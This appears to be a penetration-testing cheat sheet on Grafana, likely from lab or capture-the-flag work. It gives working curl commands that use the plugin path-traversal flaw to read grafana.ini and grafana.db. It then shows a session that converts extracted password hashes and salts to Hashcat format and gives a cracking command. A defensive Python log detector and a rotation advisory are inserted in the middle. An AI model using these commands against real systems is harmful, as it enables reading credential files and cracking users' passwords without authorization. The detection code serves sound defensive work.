Grafana
Grafana configuration files
/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
Grafana LFI
curl --path-as-is http://10.10.69.90:3000/public/plugins/mssql/../../../../../../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://10.10.69.90:3000/public/plugins/mssql/../../../../../../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
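Detecting the two requests above in access logs, as an added example (not part of the original notes): a Python check that flags requests whose path under /public/plugins/<plugin-id>/ climbs out of the plugin directory, including percent-encoded variants. The log lines are constructed and assume a Common Log Format access log that records the raw request path, for example from a reverse proxy in front of Grafana.

```python
import re
from urllib.parse import unquote

# Static plugin route used by the requests above: /public/plugins/<plugin-id>/<file>
PLUGIN_ROUTE = re.compile(r"^/public/plugins/[^/]+/(?P<rest>.*)$")
# Assumed log layout (Common Log Format): ip ... "METHOD PATH PROTO" status ...
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so %2e%2e and %252e%252e are both normalised."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_plugin_dir(path):
    """True if the part after /public/plugins/<id>/ climbs above that directory."""
    path = decode_fully(path.split("?", 1)[0]).replace("\\", "/")
    m = PLUGIN_ROUTE.match(path)
    if not m:
        return False
    depth = 0
    for seg in m.group("rest").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:          # left the plugin directory
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def find_traversal(lines):
    """Return (client_ip, raw_path, status) for every request that escapes."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and escapes_plugin_dir(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up sizes and file names)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /public/plugins/mssql/../../../../../../../../etc/grafana/grafana.ini HTTP/1.1" 200 1024',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /public/plugins/mssql/img/logo.svg HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /public/plugins/mssql/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/lib/grafana/grafana.db HTTP/1.1" 200 40960',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /public/plugins/mssql/img/../module.js HTTP/1.1" 200 100',
]
```

A hit with status 200 means the file was served, so grafana.ini secrets and every credential stored in grafana.db should be treated as exposed and rotated.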
Convert Grafana hashes to Hashcat's PBKDF2_HMAC_SHA256 format.
❯ cat hashes
7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl
❯ python3 Decrypt.py hashes
[+] Grafana2Hashcat
[+] Reading Grafana hashes from: hashes
[+] Done! Read 2 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[*] Outfile was not declared, printing output to stdout instead.
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
[+] Now, you can run Hashcat with the following command, for example:
hashcat -m 10900 hashcat_hashes.txt --wordlist wordlist.txt